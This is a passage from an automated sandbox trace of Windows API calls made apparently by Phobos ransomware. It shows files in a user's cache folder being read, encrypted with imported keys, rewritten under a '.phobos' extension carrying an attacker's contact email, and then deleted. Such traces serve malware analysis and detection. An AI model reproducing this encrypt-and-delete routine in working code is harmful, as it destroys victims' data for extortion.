phKey=0x2c9fba8*=0xa32ae8) returned 1 [0196.962] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0196.962] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0196.962] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0196.963] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0196.963] CryptDestroyKey (hKey=0xa328a8) returned 1 [0196.963] CloseHandle (hObject=0x130) returned 1 [0196.963] CloseHandle (hObject=0x178) returned 1 [0196.963] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\ea618097e393409afa316f0f87e2c202_827c1b837652b048c4c84237d0838585")) returned 1 [0196.964] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0196.964] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\f293aead5e84facfb686c4a620718928_c8424a0b24a72939b13720d0c000c9c1"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0196.965] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1612) returned 1 [0196.965] CloseHandle (hObject=0x178) returned 1 [0196.965] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\f293aead5e84facfb686c4a620718928_c8424a0b24a72939b13720d0c000c9c1")) returned 0x2024 [0196.965] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\f293aead5e84facfb686c4a620718928_c8424a0b24a72939b13720d0c000c9c1.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0196.965] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\f293aead5e84facfb686c4a620718928_c8424a0b24a72939b13720d0c000c9c1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0196.965] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0196.965] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0196.965] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\f293aead5e84facfb686c4a620718928_c8424a0b24a72939b13720d0c000c9c1.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0196.966] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328a8) returned 1 [0196.966] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0196.966] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x64c, lpOverlapped=0x0) returned 1 [0197.309] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x650, dwBufLen=0x650 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x650) returned 1 [0197.310] WriteFile (in: hFile=0x130, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x650, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x650, lpOverlapped=0x0) returned 1 [0197.310] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa329e8) returned 1 [0197.310] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0197.310] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0197.310] CryptDestroyKey (hKey=0xa329e8) returned 1 [0197.310] WriteFile (in: hFile=0x130, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0197.310] CryptDestroyKey (hKey=0xa328a8) returned 1 [0197.310] CloseHandle (hObject=0x178) returned 1 [0197.311] CloseHandle (hObject=0x130) returned 1 [0197.311] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\f293aead5e84facfb686c4a620718928_c8424a0b24a72939b13720d0c000c9c1")) returned 1 [0197.311] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0197.311] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\696f3de637e6de85b458996d49d759ad"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0197.709] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=244) returned 1 [0197.709] CloseHandle (hObject=0x160) returned 1 [0197.709] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\696f3de637e6de85b458996d49d759ad")) returned 0x2024 [0197.709] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\696f3de637e6de85b458996d49d759ad.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0197.709] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\696f3de637e6de85b458996d49d759ad"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0197.709] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0197.709] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0197.709] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\696f3de637e6de85b458996d49d759ad.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0197.710] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32aa8) returned 1 [0197.710] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0197.710] ReadFile (in: hFile=0x160, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xf4, lpOverlapped=0x0) returned 1 [0197.710] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x100, dwBufLen=0x100 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x100) returned 1 [0197.710] WriteFile (in: hFile=0x140, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x100, lpOverlapped=0x0) returned 1 [0197.711] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa328a8) returned 1 [0197.711] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0197.711] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70, dwBufLen=0x70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70) returned 1 [0197.711] CryptDestroyKey (hKey=0xa328a8) returned 1 [0197.711] WriteFile (in: hFile=0x140, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x122, lpOverlapped=0x0) returned 1 [0197.711] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0197.712] CloseHandle (hObject=0x160) returned 1 [0197.712] CloseHandle (hObject=0x140) returned 1 [0197.712] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\696f3de637e6de85b458996d49d759ad")) returned 1 [0197.712] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0197.712] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7396c420a8e1bc1da97f1af0d10bad21"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0198.035] GetFileSizeEx (in: hFile=0x168, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=256) returned 1 [0198.035] CloseHandle (hObject=0x168) returned 1 [0198.035] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7396c420a8e1bc1da97f1af0d10bad21")) returned 0x2024 [0198.035] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7396c420a8e1bc1da97f1af0d10bad21.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.035] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7396c420a8e1bc1da97f1af0d10bad21"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0198.035] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.035] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.035] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7396c420a8e1bc1da97f1af0d10bad21.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0198.036] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ca8) returned 1 [0198.036] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.036] ReadFile (in: hFile=0x168, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x100, lpOverlapped=0x0) returned 1 [0198.036] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x110, dwBufLen=0x110 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x110) returned 1 [0198.036] WriteFile (in: hFile=0xac, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x110, lpOverlapped=0x0) returned 1 [0198.037] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa328a8) returned 1 [0198.037] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.037] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70, dwBufLen=0x70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70) returned 1 [0198.037] CryptDestroyKey (hKey=0xa328a8) returned 1 [0198.037] WriteFile (in: hFile=0xac, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x122, lpOverlapped=0x0) returned 1 [0198.037] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0198.037] CloseHandle (hObject=0x168) returned 1 [0198.037] CloseHandle (hObject=0xac) returned 1 [0198.038] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7396c420a8e1bc1da97f1af0d10bad21")) returned 1 [0198.038] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0198.038] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_c080da2ae431c1a7f3b0c147eeb043ed"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0198.039] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=390) returned 1 [0198.039] CloseHandle (hObject=0xac) returned 1 [0198.039] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_c080da2ae431c1a7f3b0c147eeb043ed")) returned 0x2024 [0198.039] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_c080da2ae431c1a7f3b0c147eeb043ed.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0198.039] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_c080da2ae431c1a7f3b0c147eeb043ed"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0198.039] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.039] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0198.039] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_c080da2ae431c1a7f3b0c147eeb043ed.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0198.040] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ca8) returned 1 [0198.040] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.040] ReadFile (in: hFile=0xac, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x186, lpOverlapped=0x0) returned 1 [0198.041] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x190, dwBufLen=0x190 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x190) returned 1 [0198.041] WriteFile (in: hFile=0x168, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x190, lpOverlapped=0x0) returned 1 [0198.041] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa328a8) returned 1 [0198.041] CryptSetKeyParam (hKey=0xa328a8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0198.041] CryptEncrypt (in: hKey=0xa328a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0, dwBufLen=0xb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xb0) returned 1 [0198.041] CryptDestroyKey (hKey=0xa328a8) returned 1 [0198.041] WriteFile (in: hFile=0x168, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x162, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x162, lpOverlapped=0x0) returned 1 [0198.042] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0198.042] CloseHandle (hObject=0xac) returned 1 [0198.042] CloseHandle (hObject=0x168) returned 1 [0198.042] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_c080da2ae431c1a7f3b0c147eeb043ed")) returned 1 [0198.042] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0198.043] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_e907d7a04657714b5b06d18bc920971e"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0198.043] GetFileSizeEx (in: hFile=0x168, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=390) returned 1 [0198.043] CloseHandle (hObject=0x168) returned 1 [0198.043] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\8059e9a0d314877e40fe93d8ccfb3c69_e907d7a04657714b5b06d18bc920971e")) returned 0x2024 [0198.043] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js 